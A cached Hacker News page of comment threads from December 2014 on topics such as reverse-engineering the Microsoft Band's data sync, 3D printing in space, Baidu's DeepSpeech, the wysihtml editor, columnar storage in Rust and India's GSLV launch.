Pic of source w/ some of the BT protocol:https://twitter.com/JustinAngel/status/527955001436418048

Some BT functions:https://twitter.com/JustinAngel/status/528383467742957571

Methods extracted from the dll:https://twitter.com/JustinAngel/status/529876592479047682

(On OSX, strings gives you significantly less useful information, although apparently it was built by 'ianhowle' and there's a native Objective-C "CargoKit" library)

Note, there's one open source project that has theming and plans on building live sensor output: http://unband.nachmore.com/

And there's a closed source phone already that does access all the sensor data in realtime: http://www.windowsphone.com/en-us/store/app/band-sensor-moni...

I'm not too familiar with Windows Phone, but I believe you can access and decompile an unencrypted XAP if you have a rooted Windows Phone to see what it's doing.

I don't really have much experience/use/access to Windows stuff in general, but for someone w/ that kind of experience, I can't imagine it being very hard to deconstruct.

8
zeinzig 5 hours ago 0 replies      
i knew something had to be up when syncing between band and app required internet access! my fitbit always synched with just bluetooth.
9
Tommyatomic 7 hours ago 0 replies      
So far despite the decent specs the Microsoft Band is disappointing to pretty much everyone I've spoken to who bought one. Now that I know how the data storage functions additional disappointment abounds. This is clearly no exception to equating the MS Band as the windows 8 of smartwatches. I am fanatically thrilled I couldnt find one when I wanted to buy one.
22
The Go tree is now open for general work
53 points by thepumpkin1979  5 hours ago   6 comments top
1
jzelinskie 3 hours ago 2 replies      
It would be cool if they could use a bot to help guide people posting pull requests. I'm sure there's a lot of cool ideas to play around with in that space.
23
How We Email Hardware to Space
76 points by steven  8 hours ago   19 comments top 8
1
spiritplumber 13 minutes ago 0 replies      
I'm at the Mars Desert Research Station in Utah. We finally got a 3d printed approved for use, and we've been using it to do a few things. So far customized finger splints, a hose for an EVA pack (these are only semi-simulated; it's insanely cold here, and they provide the hot air to prevent face insensitivity and helmet fogging), and a little gizmo I did that lets you use a safety razor as a scalpel. If you have questions, I will try to give a cogent answer but our bandwidth is very limited and we have a simulated speed of light delay so I can't answer straight away!
2
malandrew 2 hours ago 0 replies      
Why haven't there yet been any projects for milling in space with some sort of vacuum-remelt process for reusing the milled off materials. 3D printing is great and all, but it still doesn't come close to what you can achieve with milling.

That said, this is awesome. I just think that there are pros and cons to both and we shouldn't be focused only on 3D printing.

3
sedachv 2 hours ago 0 replies      
For anyone confused about how you can print the ratcheting mechanism, I think this wrench is probably the new toothless/springless design from Roller Clutch Tools (http://www.rollerclutchtools.net/): http://3dprintingindustry.com/2013/08/20/this-year-3d-printi...
4
double0jimb0 4 hours ago 3 replies      
Scratching head on what the long term goal of this experiment was... (more 3D printing PR?)

Seems like using this manufacturing approach would be a very tough sell for any real mission.

Only benefit of 3D printing at your destination is the ability to manufacture something that was overlooked, so contingency planning. (yea, yea, someday we'll mine the printable materials on site, right...)

For just about any other item that you know you need, it would be much more weight-effective (the golden measure in launch considerations) to just build the part here on earth, where you can maximize specific density and specific strength using materials that 3D printing can't touch. Plus you aren't lugging around a heavy 3D printer + raw materials.

5
aeturnum 5 hours ago 0 replies      
I recall reading about plans to manufacture fuel on the surface of mars for a return trip. I wonder if the goal now is to manufacture fuel and raw 3d printing materials? Seems like it takes some of the pressure off the initial trip loadout.
6
Smushman 8 hours ago 5 replies      
I hope this does not come across as cynical.

As an engineer my first thought when I saw what it printed was how do you turn a bolt with a plastic wrench without breaking the wrench?

7
lostdog 4 hours ago 0 replies      
How cool! Does anyone know what changes they had to make to get their 3D printer to work in microgravity?
8
pjmlp 5 hours ago 1 reply      
Great! Now we just need replicators. :)
24
DeepSpeech: Scaling up end-to-end speech recognition
60 points by cbcase  6 hours ago   18 comments top 5
1
cbcase 6 hours ago 1 reply      
Thought it best to post the arXiv link, but there's some press coverage as well:

- https://gigaom.com/2014/12/18/baidu-claims-deep-learning-bre...- http://www.forbes.com/sites/roberthof/2014/12/18/baidu-annou...

2
pesenti 3 hours ago 1 reply      
To put it in perspective, my team in IBM Watson has already published better numbers (10.4% WER vs 13.1% WER for Baidu) on the SWB dataset. We haven't run our model on the CH part so we can't compare on the full test set. Paper here: http://www.mirlab.org/conference_papers/International_Confer....
3
greeneggs 2 hours ago 0 replies      
Very nice. I wonder if training can be simplified by training pieces of the model separately, instead of training all together. For example, the DeepSpeech model has three layers of feedforward neurons (where the inputs to the first layer are overlapping contexts of audio), followed by a bi-directional recurrent layer, followed by another feedforward layer. What would the results be if we trained the first layers (perhaps all three) on a different problem, such as autoencoding or fill-in-the-blank (as in word2vec), and then fixed those network weights to train the rest of the network?

Breaking the network up like this would reduce training time and perhaps reduce the needed training data. Since the first layers could be trained without supervision, less labeled data would be needed to train the last two layers. It would also facilitate transferring models between problems; the output of the first few layers, like a word2vec, could be fed into arbitrary other machine learning problems, e.g., translation.

If this does not work, then how about training the whole model together, but only once? The final results are reported for an ensemble of six independently trained networks. What if started by training one network, and then fixed the first three layers to train other networks? (Instead of fixing the first layers, you could also just give them a slower training rate, although it isn't clear whether that would save you much.)

4
brandonb 5 hours ago 1 reply      
This is very fast progress from Baidu's Silicon Valley AI lab! Andrew Ng only joined Baidu in May, and (nearly?) all of the co-authors of this paper have joined him since then: http://www.technologyreview.com/news/527301/chinese-search-g...

Congrats to Carl, Sanjeev, Andrew, and the others.

5
gok 2 hours ago 2 replies      
So with 300 hours of training data it does worse on SWB than a DNN-HMM, or even a GMM-HMM system? But when they give it 2300 hours or training data, it can beat those 300 hour trained systems?

This is still very cool, but that comparison doesn't seem fair at all.

25
The Story of Siri, by its founder [video]
52 points by ar7hur  6 hours ago   11 comments top 4
1
jud_white 1 hour ago 0 replies      
Oct 4: Apple launches Siri

Oct 5: Steve Jobs dies

  One kind of side note. On October 5th, Steve Jobs died.  He had been involved in a lot of the process leading up to it.  We know that he was watching this launch from his house.  I don't know what he thought about it, but I like to project  that he saw it, said "It is good. This is the future, Apple's  in the middle of it. I can go now." I don't know if that's true,  but that's a projection that I like to put onto it.
I suppose this is the kind of statement you could expect from the creator of a predictive personal assistant, but wow.

2
bsaul 1 hour ago 0 replies      
This video should be broadcasted to every politician remotely involved in industry, job creation, research or education (yes, that means probably all of them) to show how a succesful technology really is the (slow) product of an entire ecosystem combined with great minds of all kinds.
3
ar7hur 3 hours ago 1 reply      
Synopsys:

    Walking backward in time, Adam discussed the technical    history of Siri as well as how the vision of virtual    personal assistants evolved over time. He wowed the     audience with a video from 1987 on a concept from Apple    where predicted a Siri like device 24 years in the future    and was only off by 2 weeks.

4
natch 5 hours ago 1 reply      
"Sorry, because of its privacy settings, this video cannot be played here."

Is this only me? I'm not blocking cookies or anything like that.

26
Safe way to upload files to Dropbox from an untrusted computer
33 points by sepeth  4 hours ago   3 comments top 2
1
socceroos 1 hour ago 0 replies      
'Safe' from the sense that it makes it difficult to compromise the security credentials of your account. However, this will do nothing to stop you from inadvertently uploading ransomware to your account.
2
sophacles 2 hours ago 1 reply      
This seems very similar to SQRL.... https://www.grc.com/sqrl/sqrl.htm how much does it differ?
27
Meditation associated with preserved telomere length in breast cancer patients
28 points by prostoalex  3 hours ago   34 comments top 6
1
tokenadult 1 hour ago 1 reply      
I see after a Google search that it has been mostly popular press outlets without experienced medical reporters who have commented on this story so far. For the most part, what we are seeing online are recycled editions of the study group's press release. The underlying journal publication "Mindfulness-based cancer recovery and supportive-expressive therapy maintain telomere length relative to controls in distressed breast cancer survivors" is open-access,[1] so medically knowledgeable people here can read the study and check whether its methodology makes sense.

I note that the lead author of the study, Linda E. Carlson, is part of a group of cancer researchers promoting "integrative" approaches to cancer treatment. Another cancer researcher commenting on this approach thinks that "integrative" cancer therapy so far promises much more than it can actually deliver in improved patient outcomes.[2] The original headline of the Fast Company article submitted here, already changed by the Hacker News moderation team, is surely wrong, and it's not at all clear that this extraordinary claim will replicate if an independent group of researchers attempt to replicate the results. If I or any of my loved ones should happen to have a case of cancer (which is rather rare in my family), I will ask for advice on how to treat it from a doctor who practices science-based medicine.

[1] http://onlinelibrary.wiley.com/doi/10.1002/cncr.29063/full

[2] http://www.sciencebasedmedicine.org/selling-integrative-onco...

2
anentropic 2 hours ago 0 replies      
It could also have been the yoga"The first group was randomly assigned to an 8-week cancer recovery program consisting of mindfulness meditation and yoga"

this is a crummy article with a crummy headline about one single study which may or may not also be crummy

3
geekam 2 hours ago 7 replies      
Can people who meditate point to good resources on how and where to start? Books, videos, blogs etc.
4
mrbonner 2 hours ago 2 replies      
Exercise can also change your DNA:http://well.blogs.nytimes.com/2014/12/17/how-exercise-change...

Exposure to radiation can change your DNA.

Heck, everything can change (read mutate) your DNA.

5
steven2012 2 hours ago 0 replies      
Telomeres are not the same as DNA.
6
ajarmst 2 hours ago 3 replies      
A more accurate headline might be that meditation appears to ameliorate genetic damage associated with stress. But I guess that's less surprising, exciting and clickable than implying that meditation causes Lamarckian inheritance.
28
Show HN: Wysihtml Open-source rich text editor for web apps
184 points by olla  14 hours ago   44 comments top 19
1
otherusername 10 hours ago 1 reply      
Something I'd really like is a way to expose CSS styles to the editor easily. One of the major problems I always run into is that my customers try to make things look like the rest of the website by hacking the text a bit.

They'll see a highlighted word or sentence with a bold font, wider spacing and a blue background. So they set the background blue, the font bold and the spacing wider. But really, the editor should provide an intuitive way to apply the <span class="highlight"> element.

Some editors out there do this, but they generally suck in other areas. Wysihtml seems to apply inline CSS. Can it easily apply a class too?

2
olla 14 hours ago 2 replies      
We are trying to revive and modernise a once popular open source editor xing/wysihtml5. It is configurable to be used with and without an iframe. The editable area API is separated from the toolbar so it would be easy to customise or completely rebuild the toolbar logic for your own app.

The Voog team

3
BenjaminN 9 hours ago 1 reply      
"Fast and lightweight" is 200ko?

We have so many choices when it comes to WYSIWYG. My favorite is https://github.com/daviferreira/medium-editor.

4
mhd 10 hours ago 2 replies      
Is there some way to sanitize the output? The prevalence of <br><br> is something I've always disliked about WYSIWYG HTML editors (something a markdown converter doesn't have to struggle with, usually).

I can do paragraphs by not manually breaking lines and instead select the second paragraph's content, then apply the "normal text" style, but this isn't exactly intuitive.

Or one could disallow further linebreaks and thus just create paragraphs when you're entering a linebreak.

5
andybak 7 hours ago 1 reply      
> Unifies line-break handling across browsers (hitting enter will create <br> instead of <p> or <div>)

This implies it isn't configurable and unfortunately - in my view this is the incorrect direction to unify in.

Hasn't even MS Word nowadays standardized on Enter=paragraph break, Shift+Enter=line break

6
kemayo 10 hours ago 2 replies      
A few feedback points, I suppose...

# Clicking the "no-color" option in the text color-picker doesn't do anything.

# Using the "remove" option on a link inserts a space as well as removing the link, which seems incorrect.

# Using the "remove" option on a link doesn't always remove the entire link. Repro on http://wysihtml.com/ by selecting the word "typewriter", adding a link, then clicking on it again and removing the link. Depending on where you clicked either "type" or "writer" will still be linked.

# Repeatedly toggling tags can get weird. e.g. select a word and keep on clicking the bold/italic/underline button, and note how it'll toggle the tag on, toggle it off, and then just start adding spaces in front of it with every subsequent click.

# Possibly related to the spaces issue, after toggling tags for a bit checking the source generated shows a lot of empty-tags, which is kind of messy.

7
j_s 4 hours ago 0 replies      
There are a lot of commercial options available too; I was reminded of the 'How I reverse-engineered Google Docs' discussion where the author recommended paying $200 for Redactor. Releasing an easily usable full-featured rich text editor is a generous gift!
8
NARKOZ 10 hours ago 1 reply      
For your rails apps you can use 'wysihtml5-rails' gem.

https://github.com/narkoz/wysihtml5-rails

Author plans to update it to use wysihtml as a drop-in replacement.

9
cstigler 4 hours ago 0 replies      
FWIW, we've been pretty happy with the Froala Editor: https://editor.froala.com/
10
WimLeers 6 hours ago 1 reply      
Why fork something that is incomplete, unstable, has very limited test coverage, and doesn't tightly control the generated markup?

CKEditor has had the ACF (Advanced Content Filter) for >1.5 years now. It allows you to very tightly control which tags and attributes are allowed.

This feature, and the rest of CKEditor has much, much more test coverage to account for the many browser quirks (notably in contentEditable) that they have had to work around, to prevent regressions.It's a waste of time for everybody to solve the same problems and work around the same browser quirks over and over again.

The "Ability to add uneditable area inside editor text flow (useful when building modules like video tools, advanced image editor etc)." feature is probably the only interesting feature. But it's nothing compared to CKEditor Widgets, which does exactly this, and much more (think storing structured content but transforming it to the specific markup that a frontend developer wants).Just compare Wysihtml's "advanced" demo to the CKEditor Widgets demo: http://docs.ckeditor.com/#!/guide/dev_widgets

See http://docs.ckeditor.com/#!/guide/dev_advanced_content_filte... for more about ACF and http://docs.ckeditor.com/#!/guide/dev_widgets for more about Widgets.

And yes, it's open source: GPL/LGPL/MPL/commercial: http://ckeditor.com/about/license

If we'd collaborate more rather than reinventing the wheel, we'd get so much further. One does not just write a WYSIWYG editor

11
fredkelly 11 hours ago 2 replies      
Having had the (dis)pleasure of working with TinyMCE on a number of past projects this looks like a no-brainer. The only thing I'm not sure about is the use of `data-wysihtml5-command` attributes to configure the toolbar, is there an option to configure this via a configuration object in JS? - e.g. I just pass the ID of the element I want to use and a set of options?
12
swalsh 11 hours ago 0 replies      
This is very cool, I've used the Telerik editor (http://demos.telerik.com/kendo-ui/editor/index) control in the past, but this might be a decent competitor.
13
metara 11 hours ago 2 replies      
so timid

Try out their beautiful working app: http://voog.com

14
LukeB_UK 9 hours ago 0 replies      
It seems to suffer from tags being left over even after all their content has been deleted. Many editors seem to suffer this too.
15
acomjean 11 hours ago 3 replies      
Cool.

but why no jquery?

Just asking.

As someone who ported a embedded website away from jquery, it was painful, and I've come to really appreciate it

16
matthew86 13 hours ago 0 replies      
Thanks! Been looking for such editor. Will try it out soon.
17
curiously 2 hours ago 0 replies      
so after I create an html how do I "export" out the html code?
18
partsteet 13 hours ago 0 replies      
Looks nice.
19
kaspar-naaber 13 hours ago 0 replies      
Cool!
29
Columnarization in Rust
71 points by steveklabnik  9 hours ago   21 comments top 6
1
kbenson 8 hours ago 1 reply      
So like everyone without a job, Ive started to learn Rust. And like everyone who has started to learn Rust, I now feel it is very important to tell you about my experience with it.

Well, that sums that up pretty succinctly. :)

3
mkaufmann 6 hours ago 0 replies      
While I like the construction of the column store and the corresponding API. The claims of the author don't really make sense:

> "... columnarization, a technique from the database community for laying out structured records in a format that is more convenient for serialization than the records themselves."

Column stores in comparison to row stores don't offer any serialization benefit per se. The main benefits are the following, I will be using a record (A,B,C,D,E) as example with all types u32 (4 bytes):

* If you only use some fields you have to load less data from memory/disk into the CPU cache and your working set is more probable to fit into cache. For example when filtering only the records where A=22 and B=45 you only have to actually load x(sizeof(A)+sizeof(B)) = x8 bytes instead of xrecord_size=x20. This can make a very significant difference.* When using compression to reduce the size of data, columns can often be compressed better because they only contain data of the same type and nature and thus probably share similarities. When using such a small record consisting only of integers it probably won't make a difference. But if e.g. some fields are country abbreviations, textual description or others are ids, one could easily imagine that there are gains.

Coming back to the point about serialization, using the same technique as described in the blog post, there won't[1] be a performance difference between column storage and row storage (e.g. using a struct). The method described in the blog post just lets the data array of the original vector be wrapped by a Vec<u8> without even moving the memory, so the method is independent of the data type that is stored in the vectors. Of course it will only work for data types that do not contains references, otherwise we could get illegal memory access after deserialization (which should be guaranteed by the rust type system because only Copy types are allowed).

The only thing this benchmark is testing is how fast a vector can be initialized.

[1] There can be an space improvement of keeping the data in a column layout compared to row layout when using normal structs. Normal structs normally align the total size to the size of the largest field in the struct. A struct containing i64 and i8 would contain 7 bytes of padding. In a column layout this overhead would be avoided. Still there would not be an improvement in this serialization scheme as it does not actually copy any data.

4
skybrian 7 hours ago 1 reply      
I'm not familiar with Rust, but I wonder how much copying this does for deeply nested types?
5
thomasahle 8 hours ago 6 replies      
Seeing how the Rust community seems to have converged on using `uint` as the default type for array indexing and so on; wouldn't it make sense to reflect that in the complexity of the name of the types?

Instead of (uint, int) we could have (int, sint) or (uint, sint).

6
arthursilva 8 hours ago 1 reply      
Make sure you compile your release/bench builds with --release (if using cargo) or (-O if using rustc).
30
First Experimental Flight of India's Launch Vehicle GSLV Mk-III Successful
83 points by svasan  15 hours ago   9 comments top 4
1
suprgeek 8 hours ago 0 replies      
This is a good first step.The GSLV has been notoriously difficult to get right for ISRO.

Next step is to get the Cryogenic Upper stage to actually provide the critical thrust that will finally power it into a GesSyncronous orbit. On this mission it was bolted on but passive.

2
robodale 7 hours ago 2 replies      
I'm happy to see other countries are advancing their space capability, and hope this trend continues.
3
listic 5 hours ago 2 replies      
What is the ultimate goal of GSLV? What kind of crew vehicle will it ultimately launch?
4
hamitron 4 hours ago 1 reply      
Those animated flag gifs don't do much to contribute to their credibility.
       cached 19 December 2014 02:02:02 GMT